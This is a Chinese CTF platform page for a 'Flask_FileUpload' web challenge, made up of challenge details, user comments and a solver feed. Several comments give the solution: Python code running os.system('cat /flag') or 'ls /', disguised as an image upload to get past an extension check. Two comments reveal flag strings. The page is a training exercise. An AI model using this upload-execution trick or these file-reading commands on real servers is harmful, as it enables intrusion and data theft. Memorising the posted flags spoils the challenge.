Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Lazzaro
一血奖励: 3金币
解  决: 12263
提  示:
描  述:
Flask_FileUpload
评论
2802867984 2年前

!-- File "/app/upload/1111.jpg", line 1 Python 3.9.7 (tags/v3.9.7:1016ef3, Aug 30 2021, 20:19:38) [MSC v.1929 64 bit (AMD64)] on win32 ^ SyntaxError: invalid syntax --&

回复 0

1019697179 2年前

import os os.system('cat /flag')//导入OS才能使用system,cat是查询命令

回复 1

15091760453 2年前

flag{1c6b553c3a91791993b859e1625275ac}

回复 0

Cat00011cat 2年前

import os os.system('ls / -l') os.system('cat /flag')

回复 2

nf1y 2年前

为啥我返回包出现的是这样 File "/app/upload/test.jpg", line 1 SyntaxError: Non-UTF-8 code starting with '\xff' in file /app/upload/test.jpg on line 1, but no encoding declared; see http://python.org/de

回复 0
不知名学渣 2年前

@aWxvdmVjdGY 我是小白,请问大佬,我很好奇为什么传图片就会以代码形式执行,那么这个实现是类似apache的解析漏洞吗?

回复 0

aWxvdmVjdGY 2年前

1、<input type="file" name="file" accept=".jpg,.png">这里限制了格式,后端也会检查。需要将py文件后缀为png,然后上传会议python文件执行

回复 0

白猫a 2年前

这个作者可以哇,题目解的真精彩!!!

回复 1

gfpeak 2年前

<!-- flag{9e5c134c066dc490c9644ecd9655a482} -->

回复 0
aWxvdmVjdGY 2年前

不同的场景答案是不一样的

回复 0

2224525664 2年前

我只想说牛逼!!!!来自小白的感叹

回复 1

18196731832 3年前

注意换行

回复 2
aWxvdmVjdGY 2年前

用python开发工具写就好了

回复 0

甜甜 2年前

恍然大悟呀

回复 0

丶我亚索贼六 3年前

import os os.system('cat /flag')

回复 1

WriteUp

image
国家级划水运动员

3 金币

评分(20)

解题动态

2021060287 攻破了该题 12小时前
wlaqxb 攻破了该题 18小时前
aaaaab 攻破了该题 1天前
那天晚风和她 攻破了该题 2天前
姥姥 攻破了该题 2天前
聪10011 攻破了该题 4天前
xiaona1111 攻破了该题 4天前
qianye 攻破了该题 5天前
shuishuang1003 攻破了该题 6天前
zjh240609 攻破了该题 6天前
yamojito 攻破了该题 6天前
克瑞兹123 攻破了该题 7天前
咻猫 攻破了该题 7天前
mhxiaobai 攻破了该题 8天前
zeeker001 攻破了该题 8天前
huasir 攻破了该题 10天前
1494324192 攻破了该题 10天前
孙燕姿圈外男友 攻破了该题 10天前
liutong27 攻破了该题 10天前
阿狸沙堤 攻破了该题 13天前
问题反馈